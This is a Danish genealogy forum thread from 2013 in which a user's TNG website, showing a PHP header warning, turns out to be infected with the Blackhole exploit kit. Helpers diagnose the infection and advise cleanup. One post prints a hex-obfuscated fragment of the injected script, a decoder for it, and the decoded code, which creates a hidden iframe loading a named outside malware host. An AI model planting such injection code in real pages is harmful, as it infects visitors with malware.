Header information.

Anne Ravnskjær · 27 Maj 2013 - 16:08

Hvad betyder nedenstående advarsel, når jeg login på min hjemmeside?

Warning: Cannot modify header information - header already sent by (output started at /..../..../public_html/checkinlog.php;...) in/........ osv.

Har fået installeret Explore 10. Har det nogen betydning?

jeg kan selvfølgelig ikke huske om jeg har login engang tidligere efter Explore 10 er blevet installeret.

Anne R

Arne Feldborg · 27 Maj 2013 - 17:23

Det er en php fejl på den side du forsøger at.komme ind på.

Anne Ravnskjær · 27 Maj 2013 - 21:03

Tak Arne for dit svar.

Så er det næste spørgsmål, om det er et midlertidigt problem på serveren eller mit slægtsprogram, der er defekt. Håber, at fejlen forsvinder af sig selv.

Anne R

Arne Feldborg · 27 Maj 2013 - 22:47

Fejlen forsvinder ikke af sig selv.

Der er en 2 - 3 typiske fejlkilder. Jeg har desværre ikke mulighed for at skrive et længere svar lige nu.

Jeg vender tilbage i morgen aften. Prøv at søge på Google, eller håb på at en anden svarer.

Anne Ravnskjær · 27 Maj 2013 - 23:12

Man siger, at håbet er lysegrønt, så jeg havde håbet på, at det var et server problem, som min "host" i USA fik rettet i løbet af natten.

Jeg har kigget på Google, men ved ikke helt hvad jeg skal søge efter pga. manglende it viden. Jeg søger videre. Tilsyneladende virker siden, men hvor længe den gør det, ved jeg ikke. Det er ikke særligt trygt med en warning.

NB. Den eneste ændring jeg umiddelbart kan se er, at der er forskel størrelser på teksten i de forskellige felter.

Anne R

PS. Tror at jeg har fattet så meget nu, at det må handle om en fejl i min checklogin.

Jan Boesgaard · 28 Maj 2013 - 10:59

Stå en masse her, dog på engelsk.
http://www.geeklog.net/faqman/index.php?op=view&t=38

Som jeg læser det, sker det typisk fordi man har redigeret i den først fil den henviser til i det linie nr.
Man skal så evt. tage en anden editor og kigge i den fil på den linie.

.. så det lyder ikke som en server fejl!

Anne Ravnskjær · 28 Maj 2013 - 11:40

Hej Jan

Jeg forstod også på Arnes indlæg, at det er et software problem - nu problemer.

Advarslen lyder sådan:

Warning: Cannot modify header information - headers already sent by (output started at /home/ravnskia/public_html/checklogin.php:158) in /home/ravnskia/public_html/genlib.php on line 55

På baggrund af den artikel du linker til, så jeg læser ovenstående meddelelse sådan, at problemet/fejlen findes i filen genlib.php på linje 55.

Men, men,

1) jeg aner ikke, hvordan jeg skal finde frem til denne fil.
2) jeg aner ikke, hvad der skal stå på linjen for at korrigere fejlen. Eller hvor der er et whitespace for meget.

Jeg har også en fejl på gedcom.php linje 796.

mvh

Anne R

Jan Boesgaard · 28 Maj 2013 - 12:34

Hej Anne

Ja godt godt forstå at du ikke havde rodet med det selv.
Du nævnte kun du havde opgraderet IE (Internet Explore)

Har du mulighed for at prøve med en anden slags browser?

Citat fra: Anne Ravnskjær Dato 28 Maj 2013 - 11:40
Hej Jan
1) jeg aner ikke, hvordan jeg skal finde frem til denne fil.

Du skal via. en ftp klient program logge på din hjemmeside.
Brug hertil dit ftp_login og ftp_password samt ftp_site

Så ligger den i "public_html/checklogin.php"

Citat fra: Anne Ravnskjær Dato 28 Maj 2013 - 11:40
2) jeg aner ikke, hvad der skal stå på linjen for at korrigere fejlen. Eller hvor der er et whitespace for meget.

Du kunne måske nævne hvad der stå i den linje så kunne det være jeg kunne sige det.

MEN...

Jeg syntes ikke du skal springe ud i det. Kan ikke være af den grund, fejlen er opstået.
Du nævner jo kun at du opgraderet IE. Ikke at du redigeret i noget.
Kunne du havde du lavet nogle ændringer via. ftp eller måske upload eller flyttet rundt på noget i dit programmel, via. hjemmesiden?
Hvad programmel er det egentlig du bruger på din side?
TNG, Webtree, phpGedview eller noget i den retning?

Anne Ravnskjær · 28 Maj 2013 - 16:11

Hej Jan

Det drejer sig om TNG. Jeg har ikke været inde og ændre noget og uploaded sidste gang den 23/5. Problemet viste sig den 27/5. Har dog i de fire dage importeret mange Gedcom filer. Hjemmesiden kan stadig importere, men ikke lave gedcom filer.

Jeg tror ikke længere at problemet har noget med opdateringen til IE 10 at gøre. Det må være et software problem.

Den eneste ftp. client jeg kender er Filezilla. Jeg har været inde og kigge, kan kun se en up/down load funktion. Jeg fandt både checklogin.php og genlib, men skal ikke have pillet ved noget. Jeg vil nødig gøre situationen endnu værre.

Egentligt burde det vel være en eller anden php "device", man skal bruge. En admin. / client eller hvad det nu hedder i forbindelse med php. I cpanel findes en phpMyadmin under databaser og under software service en liste over php configurationer, der er brugt. Ingen af dem virker relevante. Jeg har fundet min webmaster guide. Den indeholder heller ikke noget brugbart om php.

Jeg er også blevet usikker på om jeg i det hele taget kan åbne selve programmet. Det er en (næsten) færdig pakke, som jeg har købt.

Hvis ikke Arne har den rigtige løsning, så tror jeg at jeg må starte forfra med en nyere version af TNG.

Anne R

Arne Feldborg · 29 Maj 2013 - 00:05

Jeg har nu forsøgt at komme ind på din side, og jeg beklager at jeg ikke har haft / mulighed for at gøre det før, og derfor heller ikke har kunnet advare dig før nu.

Problemet er tilsyneladende værre end antaget. Jeg formoder det er siden:
http://www.ravnskiaer.eu/
det drejer sig om.?

Denne side er tilsyneladende inficeret med noget snavs og dit antivirusprogram burde egentlig advare dig imod at gå ind på siden.
http://en.wikipedia.org/wiki/Blackhole_exploit_kit

Det er dog ikke alle virusprogrammer der giver advarsel mod denne, og det er jo heller ikke alle antivirusprogrammer der overhovedet checker for disse typer at inficerede websider.

Må jeg lige høre, er der andre der også får advarsler mod at gå ind på den side.?

Tilbage står så, at jeg er enig i det i allerede er kommet frem til, nemlig at problemet sandsynligvis opstår i checklogin.php linje 158 (som kaldes fra genlib.php line 55).

Det er dog ikke 100% sikkert at fejlen er i den linje, dem kan godt ligge tidligere og så først blive udløst der. Problemet skyldes som skrevet står at der bliver sendt noget ud til den besøgende på et tidspunkt hvor dette ikke måtte ske. Det kan være så lidt, som et enkelt mellemrum i kildeteksten et sted hvor det ikke måtte være. Ofte vil der vare tale om et linjeskift (eller en såkaldt BOM-signatur) i starten af filen, men her synes det dog at komme længere nede i filen.

Andre, men nok mindre sandsynlige, muligheder kunne feks. være at fejlen har været der hele tiden, men at en ændring i php-opsætningen (ændret niveau for ERROR-Level) har betydet at den først blive synlig nu, eller at en fejl i en af gedcomfilerne udløser en fejl i programafviklingen.

Nu kender jeg jo ikke specielt meget til TNG. Selve fejltypen er dog velkendt i mange sammenhænge, men uden at have adgang til dit system er det jo vanskeligt at sige noget konkret.

Du nævner, at du har Filezilla til rådighed. Det du i første omgang kan gøre er, at se på filernes dato. Hvis een af de nævnte filer er ændret netop den dato du nævner, så er det jo et udgangspunkt. Hvis du stadigvæk har de originale installationsfiler kan du også prøve at sammenligne filstørrelsen.

Jeg bemærker dog også, at der på nederst siderne bliver udskrevet noget javascript, som ikke skulle stå der. Det skyldes sandsynligvis at der er en fejl i kildeteksten, eller endnu værre en uautoriseret tilføjelse.

Men hvorom alting er. Hvis andre kan bekræfte, at din side er inficeret med Blackhole, så skal du nok prøve at få en mere erfaren person til at se på netop det, eller få din udbyder til at slette det hele og så starte forfra.

Anne Ravnskjær · 29 Maj 2013 - 01:02

Hej Arne

Mange tak for dit svar.

Jeg er ret bekymret for min pc og data i almindelighed. Jeg har været inde på side mange gange mellem den 23 og 27 maj, hvor advarslen dukkede op. Har sendt en gedcom fil op umiddelbart inden.

Hører meget gerne fra andre med erfaringer med virus/blackhole. Lige nu er jeg mest stemt for at lukke siden og begynde forfra.

med venlig hilsen

Anne R

Jan Boesgaard · 29 Maj 2013 - 07:35

Det vil også være det jeg vil gøre, "starte forfra!".

Kender ikke til sådan en blackhole.

John Thomsen · 29 Maj 2013 - 09:38

Der er indsat et identisk og suspekt JavaScript to steder på forsiden af nævnte .eu domæne.

Den første JavaScript blok er indsat helt i toppen af siden og består af 250 mellemrumtegn efterfulgt af <script ...>, 250 mellemumstegn mere, et </script> og 5 afsluttende indrykningstegn. Den anden JavaScript blok er fuldstændig identisk med den første og indsat længere nede i HTML-koden.

JavaScriptet er sløret, så det er svært at læse, men hvis man har tid og lyst til det, så kan man selvfølgelig afsløre hvad det indeholder.

Okay, jeg havde åbenbart tid nok. Manglede lysten, men min nysgerrighed var stor nok til at skrive et nyt JavaScript, som kan omdanne indholdet af det suspekte JavaScript til en mere gennemskuelig udgave.

Nyt venligtsindet JavaScript med bid af sløret JavaScript:

var s = "\
17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,\
1f,20,17,72,4,1,17,6d,58,69,17,70,5d,5b,59,17,\
34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,\
5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,\
1e,20,32,4,1,4,1,17,70,5d,5b,59,25,6a,69,5a,\
17,34,17,1e,5f,6b,6b,67,31,26,26,5f,5c,60,5b,58,\
69,58,59,60,58,65,6a,25,5a,66,64,26,5b,6b,5b,25,\
67,5f,67,1e,32,4,1";
s = s.split(",");
var t = "";
var n = s.length;
for (var i = 0; i < n; ++i)
t += String.fromCharCode(parseInt(s[i], 16) + 9);
alert(t);

Afsløret bid af sløret JavaScript:

function zzzfff() {
var yfdb = document.createElement('iframe');

yfdb.src = 'http://heidarabians.com/dtd.php';

Dette ondskabsfulde JavaScript udføres, når siden indlæses i browseren. JavaScriptet indsætter først en cookie og derefter kalder det denne zzzff funktion, som tilføjer et skjult iframe til sidens øverste venstre hjørne.

Da jeg besøgte siden dtd.php på heidarabians fik jeg en "uskyldig" fil indeholdende to bogstaver tilbage, nemlig "ok". Hvorfor denne fil ikke er helt så uskyldig, som den udgiver sig for, vil jeg undlade at skrive her for ikke at uddanne svage sjæle.

Malware-distributionssiden på heidarabians blev i øvrigt fundet af en sikkerhedsvirksomhed den 27. maj 2013, hvilket stemmer med den dag Anne bemærkede advarslen første gang.

Arne Feldborg · 29 Maj 2013 - 10:09

Udfra Johns oplysninger er det givetvis den omtalte iframe der udløser php-fejlen. Dvs. det er infektionen med Blackhole der er det egentlige problem, som du snarest skal have noget gjort ved.

Nogen har åbenbart fundet og udnytte et svagt sted i TNG-installationen. Den slags sker hele tiden med alle de mest populære programpakker. Check hos TNG om det er et kendt problem og om der er lavet et patch der løser det.

Måske kan du udfra filstørrelsen, sammenlignet med de originale installationsfiler, finde den eller der filer der er ændrede, og så udskifte dem. Hvis du har den mulighed bør du straks gøre det, for at andre ikke skal få ubehageligheder, hvis de er kommet til at klikke på det skjulte link.

Hvis du har is i maven og evt. har en erfaren hjælper til rådighed kan du måske nøjes med at finde de inficerede filer og udskifte dem. Hvis du har mange gedcomfiler indlæst kan du jo evt. prøve at lave en ny installation oven i, så du ikke mister dine data.

Men ellers vil det sikreste være, at slette det hele og starte forfra.

Anne Ravnskjær · 29 Maj 2013 - 10:16

Hej John

Tak for din indsats.

Forstår jeg dig rigtigt, når jeg læser, at koden i første tekstboks kan bruges til at fjerne konsekvenserne af den ondskabsfulde Java virus?

Jeg har lavet en fuld scanning af min pc med Microsoft security essential, der har fundet følgende 4 alvorlige virus:

1) Exploit: Java/CVE-2013-0431 (Kan det være synderen?)
2) Trojan: Win32/FakeSysdef
3) Exploit: Java/CVE-2012-0507
4) PWS: win32/Fareit

Kan der være kommet virus på min UBS, som jeg de sidste måneder har lagt foto, egne tekstdokumenter og downloads på?

Jeg er novice, så jeg bliver nød til at spørge, om jeg skal give min udbyder besked. Kan en host bruge en besked om en virus inficering til noget?

mvh

Anne R

P:S. Arne Feldborg havde nået skrive et indlæg, mens jeg skrev ovenstående. Min nuværende konklusion er, at jeg i første omgang må kontakte Darrin Lyhtgoes.

Anne R

John Thomsen · 29 Maj 2013 - 11:59

Citat fra: Anne Ravnskjær
Forstår jeg dig rigtigt, når jeg læser, at koden i første tekstboks kan bruges til at fjerne konsekvenserne af den ondskabsfulde Java virus?

Nej.

Koden i første tekstboks kan kun bruges til at gøre det muligt for nogenlunde almindelige mennesker at læse og forstå hvad den ondskabsfulde JavaScript kode foretager sig.

Det er nødvendigt at du fjerner den ondskabsfulde JavaScript kode fra de inficerede filer på serveren. Det kan gøres på flere forskellige måder – Arne nævner et par stykker. Desværre kender jeg ikke TNG, så jeg duer ikke til at give dig nøjagtige instrukser.

Mit gæt er at dine data er i god behold. Det er softwaren på serveren, som bør udskiftes/opdateres. Det er muligvis din udbyders ansvar at sørge for at webserveren, PHP og andet grundlæggende software på serveren er opdateret. TNG vil jeg tro er dit eget ansvar med hensyn til opdatering. Hvordan malwaren er kommet ind i systemet, har jeg ingen anelse om, så hvem sorteper hører hjemme hos er et åbent spørgsmål.

Jeg søgte tidligere i dag på et bid af den ondskabsfulde kode og fandt den på en lang række hjemmesider, hvoraf ingen umiddelbart havde noget med slægtsforskning at gøre, så selv om TNG sagtens kan være fyldt med sikkerhedshuller, så er det langt fra sikkert at TNG er synderen.

Citat fra: Anne Ravnskjær
Jeg har lavet en fuld scanning af min pc med Microsoft security essential, der har fundet følgende 4 alvorlige virus:

Java og JavaScript er to forskellige programmeringssprog ligesom søstrene Maren og Karen er to forskellige personer, så umiddelbart har de 2 Java exploits ikke noget med hjemmesiden at gøre.

Citat fra: Anne Ravnskjær
Jeg er novice, så jeg bliver nød til at spørge, om jeg skal give min udbyder besked. Kan en host bruge en besked om en virus inficering til noget?

Du kan godt skrive til din udbyder, at du har fået noget snavs indenbords og bede hende checke om hun har husket at opdatere softwaren på serveren.

Citat fra: Anne Ravnskjær
Min nuværende konklusion er, at jeg i første omgang må kontakte Darrin Lyhtgoes.

Jeg ville i første omgang bruge 5 minutter på at tage en backup, d.v.s. en kopi, af alle mine filer, som har med slægtsforskning at gøre.

I anden omgang ville jeg lave mig et krus te og sætte mig ned og kigge ud af vinduet i en halv time og overveje tredje omgang.

Anne Ravnskjær · 29 Maj 2013 - 13:01

Hej John

Kaffen er lavet og arbejdet venter.

Jeg har skrevet til Darrin Lythgoes i USA, der har udviklet TNG programmet. Jeg har forklaret lidt om problemet bl.a. med citater fra dig og Arne. Tilføjet linket her til tråden. Jeg krydser finger for, at han vil kigge på problemet. Af hensyn til andre har jeg givet ham lov til at lukke side om nødvendigt.

Jeg har også en offline version af TNG med alle mine data, men ny backups fra den 23 maj.

mvh og tak for idag
Anne R

Anne Ravnskjær · 31 Maj 2013 - 09:07

Jeg er begyndt at få stribevis af mails fra Google vedr. virus.
Samt en mail fra en Nissen via hjemmesiden. Denne har jeg tilladt mig ikke at åbne, da jeg er ret sikker på, hvad der står i den.

Har d.d. sendt en mail til Simply Hosting og bedt dem om at lukke siden ned. Det er det eneste ansvarlige.

Tak for jeres opmærksomhed og indsats.

mvh.

Anne R

Jette Sørensen · 31 Maj 2013 - 22:35

Hej Anne.

Jeg har fået de samme problemer som du har, hvad har du tænkt dig at gøre ?

Er der så også noget Virus på Wamp så selv om jeg sletter hvad der er på hjemmesiden så kommer det igen hvis jeg lægger det ind forfra eller hvad ?

Det er lidt surt ???.

Hilsen Jette

Anne Ravnskjær · 01 Jun 2013 - 00:11

Hej Jette

jeg har ikke forstand på den slags.

Så jeg har først skrevet til Darrin Lythgoes, som har designet TNG og sælger programmet, og spurgt om han vil hjælpe. Jeg har ikke fået svar og kan ikke forvente, at han springer til.

Efter Google har sendt mig omkring 15 mails om virus og har sat advarsel på hjemmesiden, har jeg skrevet til min host og bedt dem om at lukke siden. Det er det eneste ansvarlige tiltag, jeg har mulighed for lige nu.

Som jeg forstår det her, så har vira angrebet dele i selve programmering. Så ja, det hjælper ikke at slette data og lægge dem ud igen.

Indtil nu virker min offline TNG og dermed også vamp. Min PC er tilsyneladende ikke inficeret. Mine data er altså rimeligt sikrede.

Det tog mindst 3 timer at lave en fuld scanning af min PC. Virus programmet virker tilsyneladende. Det reagerede i hvert fald omgående på min hjemmeside med et - har renset PC, da jeg i går nærmere mig den. Nu holder jeg mig langt væk fra min hjemmeside.

Jeg regner med, at jeg kan starte forfra på et tidspunkt med en ny hjemmeside og uploade mine data igen. Det vil sige, at jeg vil købe den nyeste version af TNG, og overvejer at benytte mig at FTB's tilbud om gratis hosting af TNG og dansk vejledning.

mvh

Anne R

Arne Feldborg · 01 Jun 2013 - 09:15

Darrin Lythgoes burde absolut tage det her alvorligt.

Selvom virusen ikke kun går efter hans program er det jo tydeligt, at bagmændene har fundet et hul i TNG og har vidst lige præcist hvilken fil de skulle placere deres stof i for at det bliver aktiv på alle de viste sider.

Men først og fremmest: Slet omgående filen "checklogin.php" og accepter at hjemmesiden så bliver ubrugelig. Og overvej så hvordan du bedst kommer videre.

Anne Marie Holck · 01 Jun 2013 - 09:48

Jeg vil gerne vide, hvilken version af TNG, du brugte, da du konstaterede, at "der var ugler i mosen"?

Jeg så, at du skrev tidligere, at du nu ville opdatere programmet til den nyeste version.

Anne Ravnskjær · 01 Jun 2013 - 10:11

Hej Arne

Jeg har heller ikke hørt fra Simply Hosting. De plejer at svare på henvendelser.

Der er intet jeg heller vil end slette checklogin.php. Jeg ved bare ikke, hvor jeg skal lede for at finde den. Min IT ressource person kender ikke TNG og skriver eksamensopgave lige nu. Så jeg skal finde en prof. ude i byen.

Jeg har lige være inde i cpanel. Det bliver jeg ikke klogere af.
Jeg surfede lidt rundt, og et ord i phpMyadmin under status chokerede mig. Er det normalt at man bruger ord som "dræb (kill)" indenfor IT sprog?

Jeg referer:

Status

Denne MySQL - server har kørt i 14 dage, 17 timer, 10 minutter og 47 sekunder. Den startede op den 17.05.2013 kl. 9:32:27

Processer - Dræb (kill)
Bruger - Mit brugernavn
Vært - min vært
Database - Ingen
Kommando - Query
Tid - 0
Status - ---
SQL- forespørgelse SHOW PROCESSLIST

Hej Anne Marie

Jeg bruger stadig TNG801. Den nye version hedder TNG9...

mvh

Anne R

Arne Feldborg · 01 Jun 2013 - 10:23

Citat fra: Anne Ravnskjær Dato 01 Jun 2013 - 10:11
Der er intet jeg heller vil end slette checklogin.php. Jeg ved bare ikke, hvor jeg skal lede for at finde den.

Fat dit ftp-program (feks. Filezilla), find filen, højreklik og tryk "Slet".

I andre ftp-programmer kan det evt. hedde lidt anderledes, og skal måske vælges fra en menu eller med en F-tast, men princippet er det samme.

Jeg kender ikke TNG i detaljer, men udfra fejlmeldingen vil jeg tro, at filen ligger i roden på din hjemmeside.

NB. Dette er naturligvis kun symptombehandling. Tilbage står så at finde årsagen til problemet og få det fjernet.

CitatJeg surfede lidt rundt, og et ord i phpMyadmin under status chokerede mig. Er det normalt at man bruger ord som "dræb (kill)" indenfor IT sprog?

I den konkrete situation: Ja, det er helt normalt.

Anne Ravnskjær · 01 Jun 2013 - 11:43

Hej Arne

Tak for svaret.

Har jeg forstået dig rigtigt.

1) Jeg skal finde checklogin.php i højre side i Filezilla.
2) Slette den.
3) Derefter uploade til hjemmesiden.

Er det til public_html?

Anne

Arne Feldborg · 01 Jun 2013 - 12:29

Som sagt kender jeg ikke TNG i detaljer, jeg kender ikke opsætningen af dit web-sted, og jeg ved ikke hvordan du har FileZilla sat op, så det bliver helt generelt:

Hvis du har dit web-sted i højre side af Filezilla (og det er det normale) og sletter filen "checklogin.php" dér, dvs. højreklik, vælg "slet", og bekræft, så bude den forsvinde fra listen og dermed være fjernet.

Du skal ikke vælge uplod for at gennemføre det.

Anne Ravnskjær · 01 Jun 2013 - 13:20

Hej Arne

Tak. Det sagde min logik mig også efterfølgende.

Jeg tror problemet er større. En af advarslerne var denne:

Warning: Cannot modify header information - headers already sent by (output started at /home/ravnskia/public_html/checklogin.php:158) in /home/ravnskia/public_html/genlib.php on line 55

Jeg kan nu se, at der på min egen lokale offline server (venstre side af filzilla) er dukket en ny fil op =

genlip.php 30118 (størrelse) PHP-fil sidst ændret den 28.05.2013. På online serveren findes genlip.php 29467 (størrelse) PHP-fil sidst ændret den 26.10.2010

Skal den have samme tur? Har rækkefølgen af delete betydning? Vil det ændre noget på min offline version af TNG?

mvh

Anne

Anne Ravnskjær · 01 Jun 2013 - 14:47

Hej Arne

Jeg har slettet checklogin.php fra siden.

Jeg går ud fra at jeg skal gøre det samme med genlib.php, som ligger i venstre side under lokalstedet.
Jeg hører gerne fra nogen, som har en mening om det.

Anne R

Arne Feldborg · 01 Jun 2013 - 14:49

Så vidt jeg kan se har du nu fået checklogin.php slettet på serveren.

Der kommer så nogle andre advarsler, "failed to open stream" men de er ret uskadelige i den her sammenhæng. Men desværre kommer der også stadigvæk den oprindelige advarsel, denne gang fra "index.html" og infektionen er der stadigvæk.

Den computer (med en disablet virusbeskyttelse) jeg har brugt til at kontakte din side var allerede inficeret efter det første besøg. Det var jeg forberedt på, så det udgør ikke et problem. Men det kan det jo gøre for andre der ikke lige er klar over risikoen. Så det vigtigste er at få din side taget ud af drift, evt. slette hele installationen.

Mit råd må være, at du sletter alle *.php filer fra serveren. Derefter skal du helst sørge for at der er en tom "index.html" (og ingen index.php) i roden af dit vebsite.

Indtil det er gjort, så lad være med at forsøge at komme ind på siden med Internet Explorer (brug evt. Chrome hvis du vil checke noget)

Men der er nok ingen tvivl om at din egen computer er inficeret og at det er derfra det spredes videre, og vil spredes igen selvom du fjerner det midlertidigt. Så du må igang med en total scanning og rensning af din computer. Start med at slette alle midlertidige internetfiler og lad så dit antivirusprogram køre en komplet scanning og oprydning. Men igen, hvis du kender en erfaren person der kan hjælpe dig vil det absolut være en fordel.

Anne Ravnskjær · 01 Jun 2013 - 16:06

Hej Arne

Gælder det også de php filer, hvor der står admin eller ajx foran?

Anne